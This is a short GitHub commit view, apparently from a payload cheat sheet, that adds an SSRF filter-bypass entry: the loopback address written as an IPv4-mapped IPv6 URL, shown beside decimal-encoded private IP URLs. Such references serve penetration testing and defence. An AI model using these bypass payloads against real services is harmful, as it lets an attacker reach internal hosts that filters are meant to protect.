Bypass using IPv6/IPv4 Address Embedding

This commit is contained in:
PwnFunction 2019-04-13 17:06:06 +05:30 committed by GitHub
parent eb045a7d12
commit 4c6f9e21e9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -123,6 +123,12 @@ http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```
Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
```powershell
http://[0:0:0:0:0:ffff:127.0.0.1]
```
Bypass using malformed urls
```powershell